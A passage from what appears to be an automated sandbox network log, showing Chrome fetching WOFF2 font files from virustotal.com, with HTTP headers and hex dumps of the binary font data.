                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1408INData Raw: 0a 69 24 6a 07 66 a6 96 3f 32 5f 3e 75 f1 ab a1 0c 68 f8 eb 73 64 38 67 7b 4a 0f 60 f4 46 fc a1 fb 25 90 99 d4 56 ab b6 41 9d 5d 07 da a2 b4 09 81 4e 60 ca 02 db 5b 0e 3d 76 76 ea 51 f8 32 e8 40 7e 92 25 f1 a0 9e 17 f9 ce c1 c0 f4 45 71 71 4c 8b f1 5d 10 a9 f3 b1 80 02 e4 78 ec 1a d9 a1 62 88 6f cb 07 84 27 c7 ce 8f b2 28 ee d5 e3 4b 07 94 1b a9 51 16 06 87 a0 38 38 53 1d 93 90 bf 66 23 b6 9e 37 94 9e 5b 8f 81 6a 90 32 fa e6 22 48 e0 25 29 65 59 1a 82 7c 40 3e 4b 8e bd b0 a1 12 e5 fe 12 c1 7b 7d 40 52 a4 75 10 d5 82 3e 5a 62 5f 49 0d dd 4f 54 97 57 48 d0 90 db 53 bb ff 13 fa 52 06 0d 4c 7e f4 ae d3 a4 64 f2 db cc 6f af 58 a3 48 1a 08 16 8a a9 fa 3b 8b 47 e8 5c 96 a9 54 44 4f 28 d3 eb 9e ae d7 9e a4 96 b2 78 c6 80 a8 c5 6e 3b 46 4a 66 48 88 00 a2 4e 7a 55
                                                                                                                                                                                                                    Data Ascii: i$jf?2_>uhsd8g{J`F%VA]N`[=vvQ2@~%EqqL]xbo'(KQ88Sf#7[j2"H%)eY|@>K{}@Ru>Zb_IOTWHSRL~doXH;G\TDO(xn;FJfHNzU
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1280INData Raw: db 17 45 79 c1 51 0b 5b 8f 2e a2 27 24 5f 86 85 fc b0 26 f9 dd f2 b2 63 23 80 04 59 9c c2 da 3a 66 8e e5 bd d6 26 8f c7 f5 a9 6a 61 ed 19 f9 cc 7b c2 29 8b f3 3a c1 86 96 17 aa a7 e5 b5 d1 cb 19 66 e7 5c 51 48 7f 96 43 2c f8 d5 32 ec 9b 55 ff 3c 61 45 cc cd 6f c2 37 1b 36 ab 7a 5f cc 4f b5 bd fe 6b eb a8 4a aa a8 f2 f5 0b 4b ca 4f 0b 83 ca b3 f5 19 a6 1c 6e 79 d4 c7 bc 8f cd cc 4d 4f 0d f9 c0 e6 3b 3b 9a ba 77 5c a6 19 99 7d 82 ee b5 8b 8a 59 25 54 9c 77 8b ff 72 f7 8b ef 59 52 62 74 3e af 4b f0 80 72 8f 75 26 ab 6f 8f 0e 77 c8 7b 6f 23 d8 78 de 13 6c 64 94 65 66 be 38 84 02 c7 f4 d3 3e 2b 42 50 85 75 dd 99 b8 43 6c 20 99 56 ee 33 31 99 fc 19 56 88 15 b9 6e 62 09 5d 19 73 46 2f f5 bc ef c9 5a f7 3c f9 ed 0c 59 09 f4 0a 2e 26 8f 12 bf c6 a1 3e e4 9f ac 81
                                                                                                                                                                                                                    Data Ascii: EyQ[.'$_&c#Y:f&ja{):f\QHC,2U<aEo76z_OkJKOnyMO;;w\}Y%TwrYRbt>Kru&ow{o#xldef8>+BPuCl V31Vnb]sF/Z<Y.&>
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1408INData Raw: 8a fa 66 72 e7 1c f8 83 89 31 64 38 d1 c4 c8 b1 06 ef a7 10 5e 03 03 8a ae a3 5d 81 07 5b 0e f5 6d 46 66 9e d3 93 19 aa 9c 61 a2 26 4b 76 4a a7 2f 35 a7 83 93 68 b4 4c f2 08 7a 2f 48 46 01 02 ca d8 a0 d2 b4 3a 5d 69 2d 6d 2a 83 c8 44 d9 63 f0 09 68 89 a9 99 5a 4d aa 45 4c b8 29 4a 2e b2 67 93 c0 37 05 0d 53 47 38 94 ad be 61 09 bc 91 93 03 32 37 f4 1d ea 9c 05 2f 30 32 a0 0e 42 19 e1 02 7d 0b 96 99 a8 4b 4b 17 19 40 0c 2a 6d f8 30 6d 8b d3 a1 6b a9 4d 4d 49 2b 48 15 d5 18 22 13 08 bc 01 a3 54 92 98 25 ce cd 2b a4 2c 48 de c5 2b 17 30 7c 20 7f 94 ae 5e 0b 47 27 32 b3 ed 32 3d 35 e5 37 52 ed c9 7e 74 f4 55 4e 4c 5e 4b de 28 f0 6d 65 21 b1 43 a0 32 c5 c2 82 75 d4 e8 6f 63 e0 d9 5c 7d 9c 2a d9 56 18 9b 28 40 ed ae b5 d7 8c c3 26 cb d2 73 98 0a ca bb 18 5c 64
                                                                                                                                                                                                                    Data Ascii: fr1d8^][mFfa&KvJ/5hLz/HF:]i-m*DchZMEL)J.g7SG8a27/02B}KK@*m0mkMMI+H"T%+,H+0| ^G'22=57R~tUNL^K(me!C2uoc\}*V(@&s\d
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1408INData Raw: d4 60 72 ff c7 c0 1a a8 f1 7c 8b 5d 24 cf c8 b6 1b f8 b1 ba 9b b8 23 3a 55 f2 4c b6 f5 d0 24 52 42 bd f3 4b cf 04 46 7b 87 9b 3e 6f 46 05 63 da 71 76 61 1c ef 27 9b 41 7f 82 36 11 0c 61 3b ba 37 ac 5c d9 bd ba b2 82 85 d5 8b 6d a8 18 4e 6c c5 15 e6 e4 e0 bc 61 90 30 1c ef 0d ff 9e c5 17 b6 02 53 c7 d4 c6 0e 6f 72 5a 74 64 1d dc d1 01 d8 ee 2c 4b 77 b7 d1 2f 8c 07 3c 46 e5 08 bb ed 59 89 d4 a0 2e 94 24 e4 0f 4b 54 36 78 1b 12 9b 07 71 63 bb c1 77 d6 3a 49 ac be e0 82 91 c9 8d 6f 67 91 f7 a6 47 19 fd 9e ff 38 f4 56 0e a3 fe 5e 7a de ee 12 be b2 b4 33 df 25 91 1b d9 70 a3 c9 92 9a a2 71 d6 f0 c1 b2 21 93 aa a8 70 56 28 fc fa c0 7d c9 ec f9 91 15 6f 46 0d b6 a4 37 a5 cf 07 3f d8 6a 65 6e 6d c1 39 3d 8b 2b 99 2d 11 0f 17 90 ad c7 b4 bc 70 8d bf fb 5d 48 7b 18
                                                                                                                                                                                                                    Data Ascii: `r|]$#:UL$RBKF{>oFcqva'A6a;7\mNla0SorZtd,Kw/<FY.$KT6xqcw:IogG8V^z3%pq!pV(}oF7?jenm9=+-p]H{
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1408INData Raw: d5 fe 30 56 9c 82 ae 77 fb 8a 70 fb b3 7d a9 2a ea a5 13 aa ee c5 fd e0 00 ca e4 ad 2f 2d f5 d6 9a d2 d2 98 5d ac de e4 20 c6 9a 4c 6c 22 91 cd 7f ba c6 82 35 c4 3c dd c4 1b 63 3d 93 80 50 99 31 ac c8 c7 a6 3c 89 8e e4 06 9c 49 b1 e7 69 6d 06 75 7c aa 67 7a 7b 3e d8 87 92 39 b8 03 1a 69 bc 18 1f 84 93 15 a6 b2 d6 12 b1 03 f8 c8 57 57 4f 7d d7 52 45 ac 7b 59 0c ea fd 6d 0f 66 30 59 03 86 18 30 71 71 16 2f a0 15 8e b5 b0 3f e5 ec 92 f7 fe 31 e9 9d d2 a4 cc 01 fb 51 35 89 36 8d 94 5b 49 24 7e 27 50 04 04 ea da 27 98 63 1f bd f3 b2 8f 8f 0f 4a c8 d0 a7 28 dd 56 70 74 5b cc 81 74 59 54 e4 5e 72 22 ef 80 dd d3 58 58 e8 6b c9 e1 8f 08 e3 e9 ee ff 87 8d 9b a7 91 c4 27 69 75 49 b1 a9 2f 40 9b 0a 5f 2c c8 8f d8 9a cf 51 fe 2c aa 08 af 45 6a c1 01 94 ce a5 11 31 4e
                                                                                                                                                                                                                    Data Ascii: 0Vwp}*/-] Ll"5<c=P1<Iimu|gz{>9iWWO}RE{Ymf0Y0qq/?1Q56[I$~'P'cJ(Vpt[tYT^r"XXk'iuI/@_,Q,Ej1N


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    75192.168.2.164979774.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC586OUTGET /gui/1402accbefdec6a25762.woff2 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    Origin: https://www.virustotal.com
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/gui/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC316INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 75c1e407963af99a7c7e3dd3c89a4c94
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 15:37:05 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 15:37:05 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: font/woff2
                                                                                                                                                                                                                    Content-Length: 14892
                                                                                                                                                                                                                    Age: 533891
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1092INData Raw: 77 4f 46 32 00 01 00 00 00 00 3a 2c 00 0d 00 00 00 00 88 7c 00 00 39 d3 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 6e 1b cf 42 1c 90 1c 06 60 00 84 62 0a 81 88 4c eb 34 0b 84 64 00 01 36 02 24 03 89 44 04 20 05 84 66 07 8c 34 1b 99 76 25 8c db 8f 02 ba 03 bc 98 bc 94 cc 8c 44 d8 ab c5 aa 64 64 a0 64 6f 9e 9c fd ff d7 04 3a 64 08 dd 4d 01 a7 ea 03 45 10 26 88 ea 4a 83 0b 47 11 2e 1c c3 9c 33 1d 4d 78 70 aa b3 ca 14 69 b6 c5 19 f6 56 17 92 75 24 0b 5b 4f e7 3b 4d 55 c7 93 3a 6a 0b 3f 8a 85 7b 2b 2f 3c da ad 98 f7 a8 73 c5 c5 97 09 a3 5e 5b fe 11 64 ae 64 c3 af 1e d1 99 cc 87 d5 8d 74 20 41 90 80 d4 9d ec 60 b1 8f 7a 06 b6 8d fc 49 4e 5e 9e 87 9f eb f3 dc f7 32 c9 fc cc 12 b0 da 6d 59 01 6b 46 85 0a 00 5c ed fa 96 55 59 55 02
                                                                                                                                                                                                                    Data Ascii: wOF2:,|9nB`bL4d6$D f4v%Ddddo:dME&JG.3MxpiVu$[O;MU:j?{+/<s^[ddt A`zIN^2mYkF\UYU
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1408INData Raw: 7a 34 03 03 0d 23 23 96 19 07 b3 b2 d2 b3 b1 31 70 72 42 3c bc 38 3e 3e 98 9f 1f 27 20 00 0b 0a e2 84 84 18 85 85 11 62 c5 a2 44 44 08 c4 89 a3 12 2f 9e 48 82 04 56 89 d2 e8 a4 4b a7 95 2f 8a a7 81 06 68 8d b5 c4 6a a5 00 d6 4e 7b 06 85 ba e0 74 55 0c eb a7 3f 91 41 fd c6 d3 2b 6b 72 e2 32 33 95 5c 0c 30 99 e0 26 8b b8 d9 92 70 8b a5 96 91 58 ce 19 2b b8 d8 4a ce 58 15 2e b6 da 1a 26 07 66 2b 85 2c a4 84 81 11 30 26 40 e1 eb 67 06 54 a4 42 b0 5b 9f 3b bc ea 7d ff 35 86 48 a7 33 0b 01 cd 1a c0 86 01 50 f2 49 bb bd 24 75 a6 83 4c b7 14 76 39 cc d2 e2 88 41 3b b6 a6 f2 3b 8b a4 a4 98 e6 4b 57 07 ad 2d 10 56 1e 1e f5 3c 3c 14 41 fb 47 d2 84 bf 8f 65 f6 1b d1 e1 30 5e 6e 1b f5 68 e3 3f 7a d3 09 3e 38 f9 d2 33 08 61 7f bc d5 33 dd b9 bf 6d 15 5f 7d 0f c8 58 51
                                                                                                                                                                                                                    Data Ascii: z4##1prB<8>>' bDD/HVK/hjN{tU?A+kr23\0&pX+JX.&f+,0&@gTB[;}5H3PI$uLv9A;;KW-V<<AGe0^nh?z>83a3m_}XQ
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1408INData Raw: a8 56 0d 9a 10 73 3e 8c ec 56 0d fc 89 0d b6 c8 83 64 2b ee 7f a4 d1 fb 18 e3 8b f5 71 cb 1d 91 40 4b 84 20 21 25 98 5d 40 34 13 1b 9a 83 93 4c a2 1a 14 f2 e4 09 6f ac f3 8d 15 eb 25 c9 20 83 a5 0c df 7b fe 20 d8 71 15 58 08 30 4b d6 81 c7 d6 31 bb f5 a4 f4 64 e4 cc 14 38 2a 60 e3 56 d0 70 81 51 2a 01 b0 4d bb 55 9a 25 19 c1 d2 18 77 b2 f0 51 2b 3b 9a ad ed cb af 98 9e 2b 80 71 5e b3 1b 5c cc 03 01 a3 7b 5d b0 18 2c 00 a1 cd 34 db 0e 03 a0 03 6a 97 7c 7e a0 ef 19 29 8c 38 d0 91 16 10 42 a1 2d c4 03 5d d3 11 4e 03 ab 81 b9 60 76 6b d8 01 36 c1 6c 30 0c 21 b8 14 49 40 51 3e 17 12 70 86 90 8b 89 94 b4 e0 9e 98 19 9c 60 59 c2 c3 cd ad 54 40 69 2a 51 b2 49 93 22 ca cf 93 32 e5 14 99 cb e1 8c 2a aa 93 aa c1 c5 f2 38 5f 4b 4e 69 b5 84 d0 7a ea a4 b4 27 51 0c 4e
                                                                                                                                                                                                                    Data Ascii: Vs>Vd+q@K !%]@4Lo% { qX0K1d8*`VpQ*MU%wQ+;+q^\{],4j|~)8B-]N`vk6l0!I@Q>p`YT@i*QI"2*8_KNiz'QN
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC188INData Raw: fb 1e c5 08 39 b7 e3 cf 9e 45 3d 90 b6 f4 3f 51 7d bd 91 78 3b ff d6 a5 73 01 e2 6e 58 d4 be 3b 62 18 28 db f1 f7 be 3d 4a 10 5e fe 98 0e 33 c2 e0 99 02 c1 50 01 a5 28 1f c4 c3 2b 01 11 5a 81 50 8f 56 2e 49 c6 5f ef b2 07 4c 14 1f f9 2e 6e ce 18 f4 dd cf 56 19 a0 ba ff 5c b5 44 6b 36 08 08 01 cc 41 9a 70 67 9d 73 de 05 17 5d 72 d9 15 57 5d 73 dd 0d 37 dd 82 61 08 02 de f1 17 14 f6 a1 18 d1 0a 0d 6a 0a 92 22 05 15 0d 1d 03 13 6b e8 6d 91 06 d1 48 82 e4 94 d4 83 fd c4 8c b8 ae ae 1c a6 95 a0 22 19 3c 04 16 36 38 b6 5a 0d 45 a8 70 1c b0 c6 bc 7f 53 50 44 30 64
                                                                                                                                                                                                                    Data Ascii: 9E=?Q}x;snX;b(=J^3P(+ZPV.I_L.nV\Dk6Apgs]rW]s7aj"kmH"<68ZEpSPD0d
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1408INData Raw: 84 89 40 0b 54 2d c5 60 10 30 33 15 24 11 08 30 13 86 9c 75 0d 08 94 70 04 c4 08 51 38 31 1f 05 f9 99 63 2f 78 0b f8 d5 3b 12 23 0b 48 23 6f 78 e2 4b 88 a7 42 d5 7b 44 39 c6 ba 24 72 0a 29 51 d2 12 2f b0 7d b8 b7 dd 71 d7 3d f7 3d f0 d0 23 8f 3d 51 e6 2f 4f 3d 83 11 b9 86 3f 66 2e 91 6d b6 fb 22 03 76 b1 c8 7e 0b 2c bd 23 c4 81 02 8a 08 11 22 17 8e a4 ea 0c dc 7d 10 96 0d 7d c0 63 50 54 2a a2 d5 41 c1 20 97 27 ae 67 e1 06 56 6e 64 ff aa 4c 5c dc cc 12 35 52 f2 82 0b 66 54 8a 79 9b e3 ae 70 b8 da c3 51 86 90 72 ef 15 7e 5b c5 0e 08 6a 0d e9 2b 47 09 70 e1 e8 a9 48 e2 09 47 cd bd f5 b0 67 2e e3 e0 12 e4 e2 62 e4 9c 9c 06 92 91 86 8c 28 fe 3a ad 17 f0 54 5e 1f f0 71 1a 50 46 8e 95 89 1a 15 24 99 41 6a c3 7a b6 4b 15 ac 58 b2 56 a8 75 b4 33 a4 39 17 42 54 81
                                                                                                                                                                                                                    Data Ascii: @T-`03$0upQ81c/x;#H#oxKB{D9$r)Q/}q==#=Q/O=?f.m"v~,#"}}cPT*A 'gVndL\5RfTypQr~[j+GpHGg.b(:T^qPF$AjzKXVu39BT
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1408INData Raw: 00 68 aa a3 22 26 4a 9b 83 fd c0 64 31 18 66 36 71 63 f9 d9 ac d7 44 cd 89 27 c5 15 fc dc a9 5b 5c 3d 67 20 2a 3a 88 d7 36 7a fd b1 b5 26 fe b8 ab ca c7 06 f5 1b b6 56 51 3b 44 c2 10 f3 43 bd 6c 07 62 91 cf 21 c0 6d 06 3e 98 d8 6f c4 d9 b6 41 e3 29 4c de c0 dd b8 8b f6 ba dc c4 a7 b6 27 70 35 ae a6 b5 25 af f7 d7 04 38 47 49 00 96 40 45 82 73 1d 94 07 d4 52 5c 5c 2d 27 2e 91 04 75 b0 51 06 0b 6a 25 82 e3 ae b0 1d d9 16 41 63 86 7c a7 c5 6d b6 cd 66 52 43 6b 40 33 8d a7 a0 a1 a9 e7 10 c8 db 66 41 8d ee 07 e5 45 61 7e 3b c5 04 9f e3 5a 80 53 1e 32 51 6a d9 d2 3a 9c cd ff 10 db 38 75 76 7b 6d 87 d1 1e 48 5d bc 6c da ac 72 37 af 46 37 5c 9c 5b e4 17 67 a2 49 e9 76 18 73 5f 60 dd 11 72 ba 07 e2 8e 3d 10 79 34 81 d3 a1 19 86 b7 0b bb d6 b1 9a 21 18 ca 6c e4 87
                                                                                                                                                                                                                    Data Ascii: h"&Jd1f6qcD'[\=g *:6z&VQ;DClb!m>oA)L'p5%8GI@EsR\\-'.uQj%Ac|mfRCk@3fAEa~;ZS2Qj:8uv{mH]lr7F7\[gIvs_`r=y4!l
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1280INData Raw: 04 09 f4 71 e0 5c 1a 15 21 fd 0e bf 76 aa a0 a5 09 94 c4 be 3f b9 0e 35 7d 4d 27 5c f7 6a 01 2b d7 2f 6c 9b d7 39 97 06 f1 ac ba d7 f9 3c 3a 83 e3 a0 9e 1f c4 6c 9b 6a e4 9b c2 21 aa 37 c5 0e b8 7d 09 5c aa 12 8d f4 7a 03 a9 6c 84 f4 b0 e1 3d c3 74 57 31 74 c5 27 53 d0 46 52 b7 c9 ce b9 ed ba 9f d2 63 56 89 fe 16 14 ee 4b cd a9 f1 e1 e7 48 64 47 65 e8 15 2e e9 b1 f0 8b e2 68 88 11 74 26 51 06 ce d9 41 07 aa 72 c3 63 3c 1d ac 80 9e d4 75 ac 87 f3 bd 1c 04 74 c3 a4 c6 db e2 b7 3f 33 c8 67 aa c7 50 37 fd e0 ec a5 65 66 fc 7d 0c 05 8b d4 1e c5 c8 cd ed a9 b8 b4 3b 3f 88 0d da 10 a8 ce d4 9a e4 ba 12 27 a0 37 69 a9 d9 cb ef 72 23 c1 4e d6 c6 bd af 81 e2 d2 f1 af ef 5c 41 4c be 88 53 41 30 e4 9f e6 6e 31 40 89 83 0d cd b6 9f 0f fe 28 45 80 3d 0f a7 bc 26 26 96
                                                                                                                                                                                                                    Data Ascii: q\!v?5}M'\j+/l9<:lj!7}\zl=tW1t'SFRcVKHdGe.ht&QArc<ut?3gP7ef};?'7ir#N\ALSA0n1@(E=&&
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1408INData Raw: da 3b b4 a2 ba 72 f1 82 44 6b 3b 54 93 b2 fc bb b5 7c 31 48 3a ea 3f a8 2e 8e 8c 5f 98 76 0f ba e9 38 92 3f 1e 39 a4 7f df 5d 5c 76 e0 d2 e8 4b e8 c9 ca 63 a5 07 c0 f9 8a f3 33 0b 82 c7 ff cb 36 3d 84 48 ab e9 97 c0 f1 f0 f9 37 5f 81 60 24 92 a1 34 8f 0a 0a 32 4a 2c e0 0c ad f1 5a 0d de e5 c1 0d c9 c4 d8 51 06 cb 46 3c f7 24 bd 92 a1 2c f0 34 15 b1 90 06 54 96 97 99 6e a0 7e c2 1d ea 4a 2c 57 f1 98 68 c0 a0 29 56 d2 0b a2 c0 38 e1 3f 1b 15 9e e2 a6 31 ca 2a 16 34 07 94 ed a5 1a 13 a2 76 d7 16 7a 95 95 26 e2 3f e1 d7 cf 01 52 68 7d 9d 4a d5 ec f5 eb 9b 1b 55 5a 3e 42 5e b8 da f8 1b 81 83 70 69 41 79 c0 5f 0b 53 36 05 a4 53 3c 24 f0 98 6e 31 7d b0 db a3 6c 29 d7 c8 58 b7 9e a2 a2 a7 02 13 48 3d ea 94 83 91 89 e8 55 c6 57 77 c7 65 d3 1f e4 fa e5 61 53 25 c0
                                                                                                                                                                                                                    Data Ascii: ;rDk;T|1H:?._v8?9]\vKc36=H7_`$42J,ZQF<$,4Tn~J,Wh)V8?1*4vz&?Rh}JUZ>B^piAy_S6S<$n1}l)XH=UWweaS%
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1408INData Raw: ce 31 f0 b5 57 59 b7 72 34 be b9 43 f1 43 c8 1b 83 f0 60 62 5e 72 48 ab 8c d1 7e 18 f6 8d c9 5d 71 e1 ff 98 fb 0e ad f7 33 f5 4c 03 8f fc 69 96 33 00 2a a0 6b 11 b4 30 79 ea ff 7b 57 1d 45 33 37 e9 27 8d 20 79 0c c2 bf b4 14 60 0e 06 9c 46 59 f1 b7 ae 1b f5 6c c2 15 72 ee 11 96 54 55 c8 15 f8 24 9c 1c 78 35 46 8e 71 e6 70 72 4d 08 23 4f 03 5b 94 6c 36 6c 94 d9 ff 09 97 7e f9 35 b7 fc 37 17 4f de 51 85 f9 61 3c 1d c6 3a 73 7a 0d 25 8c 83 27 65 76 83 94 72 f7 f8 d3 48 55 4e d6 0b f8 4e b7 6d da b3 75 5b d3 78 79 59 d3 f8 b6 ad 4d 7b 4a 0d 72 78 60 e9 52 b8 47 2e 47 7a 96 2e 45 06 80 07 59 f9 65 9b e4 98 1e b3 45 a7 1c 44 00 23 b6 ac 6c c1 b0 a9 4d 24 53 99 34 0c 98 f3 c1 83 de 42 b1 b6 a0 a6 36 a4 36 f6 b4 2d 74 b8 df 6c c5 9e b0 80 bb b4 b3 46 fa ef dc eb
                                                                                                                                                                                                                    Data Ascii: 1WYr4CC`b^rH~]q3Li3*k0y{WE37' y`FYlrTU$x5FqprM#O[l6l~57OQa<:sz%'evrHUNNmu[xyYM{Jrx`RG.Gz.EYeED#lM$S4B66-tlF
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1280INData Raw: 52 71 19 6b 90 49 4b 1f 91 45 88 15 61 e0 7c 02 d8 cc e4 e0 16 4e 4c 1a 97 d1 2e 11 da 82 a4 0f 19 c5 06 9f b6 bf c7 52 04 f7 49 aa aa 15 cb 22 15 ae 37 16 5a 42 5c 1f 36 d5 bb b3 34 d3 34 39 fd bb e5 f8 cd 5f 7e 8a a6 2f c8 76 d1 f8 dd a0 30 f3 aa 57 11 4e 79 2b a4 2c c6 1c 95 a0 7b 41 46 36 d1 eb 53 86 bb 15 c5 07 e6 8f ee ab 83 39 49 84 06 eb 91 83 e0 18 0d fb a6 55 57 aa 84 2d 50 59 9d 33 0a 69 3c f7 7d 29 cf 49 a3 53 84 fe 3e 77 83 3d f1 21 56 f4 21 ad 78 21 10 3b 0b 7d 25 b5 1c 5a 2f 15 3b 1c eb af 30 32 19 2a b3 4e 9b 9b 8b e8 2d 1b b6 cb c0 61 9a 67 67 95 6f c5 65 13 49 9f 51 28 ff a6 30 85 9d d9 f8 0a 12 a6 07 55 b1 e9 53 86 d0 26 15 52 ca 6e c5 92 e8 52 9f 16 34 ad 9e 69 46 35 41 02 af e0 71 e1 21 f2 d8 0b eb df 4a ae b2 1e 1c a5 c5 56 56 f9 56
                                                                                                                                                                                                                    Data Ascii: RqkIKEa|NL.RI"7ZB\6449_~/v0WNy+,{AF6S9IUW-PY3i<})IS>w=!V!x!;}%Z/;02*N-aggoeIQ(0US&RnR4iF5Aq!JVVV


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    76192.168.2.164979974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC586OUTGET /gui/ee990a93df71bfdfb3b5.woff2 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    Origin: https://www.virustotal.com
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/gui/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC316INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: fa9f0f5af78fab628ae1585d180df044
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 14:00:08 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 14:00:08 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: font/woff2
                                                                                                                                                                                                                    Content-Length: 14824
                                                                                                                                                                                                                    Age: 539708
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1092INData Raw: 77 4f 46 32 00 01 00 00 00 00 39 e8 00 0d 00 00 00 00 88 08 00 00 39 92 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 6e 1b cf 36 1c 90 1c 06 60 00 84 62 0a 81 87 50 ea 78 0b 84 64 00 01 36 02 24 03 89 44 04 20 05 84 7c 07 8c 34 1b 67 76 25 ca 6d 17 c5 dd aa 92 42 f0 a4 97 91 81 c0 79 04 d0 8a fc a6 91 08 73 42 e6 3c f8 ff 8f 07 74 0c 11 3a 53 90 e9 fe 40 82 83 5c ed b4 bb 1a 77 13 d5 78 c6 ef 99 e9 38 41 4d 57 ea 53 95 8b 98 1d 2e e7 5a 3f 12 24 f3 e4 dd 12 10 17 b5 6d 75 74 ad f3 b7 f9 f2 58 82 9c 40 cd fa 5f fe e7 9f 5f 24 81 02 41 66 27 67 af a9 f3 27 10 64 08 78 86 71 26 90 dc ae 54 31 51 5f 94 98 9d 9d 6e 85 e3 a6 8a 7a 85 d7 5f 7d 06 b8 93 23 76 22 f2 f0 ff fe fd bf 73 ed 73 2e 9e fd ad f6 07 50 69 56 42 45 57 e9 32 52
                                                                                                                                                                                                                    Data Ascii: wOF299n6`bPxd6$D |4gv%mBysB<t:S@\wx8AMWS.Z?$mutX@__$Af'g'dxq&T1Q_nz_}#v"ss.PiVBEW2R
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1408INData Raw: 46 46 3a 26 26 2c 33 33 3d 0b 0b 81 8d 08 b3 b3 33 71 70 30 73 73 43 bc 02 88 02 05 c2 82 04 11 05 0b 86 85 08 21 0a 15 ca c2 c7 87 08 17 8e 16 21 02 23 52 24 ad 28 51 e4 a2 45 b3 8b 91 c8 28 49 12 83 86 b2 49 e4 c8 c1 ca 57 40 d0 5c 6b 58 1b 6d 99 15 ea 44 54 a4 07 ac 9f fe e4 06 cd 9e d0 64 a2 13 95 29 a6 56 06 d6 3c 62 35 57 6c e6 e7 fa 5b 60 21 85 45 c2 59 2c 7e 96 08 67 69 ae 9f 65 96 b3 da f3 5a 95 90 39 34 30 d0 00 da 18 34 a9 db 2c a0 42 19 42 c7 1c 48 75 de fe df d8 d3 cb 26 65 13 0a 82 29 79 06 d6 6b 93 54 dd e9 6e 5c a3 75 e5 9b 68 ff d1 1a 14 a6 92 e3 7a 1c c0 8d 69 a5 59 0c 6d de dc 60 68 bb 52 63 a7 1d 66 8b 55 6a ae 57 c5 db 43 a5 b8 e0 c3 91 5c 1d 3b 5d 1e 23 0d b9 d7 7b 70 84 ec 85 91 72 a7 be f5 f6 b9 97 dd d3 1f 27 ad ff 8f d6 bf de 9f
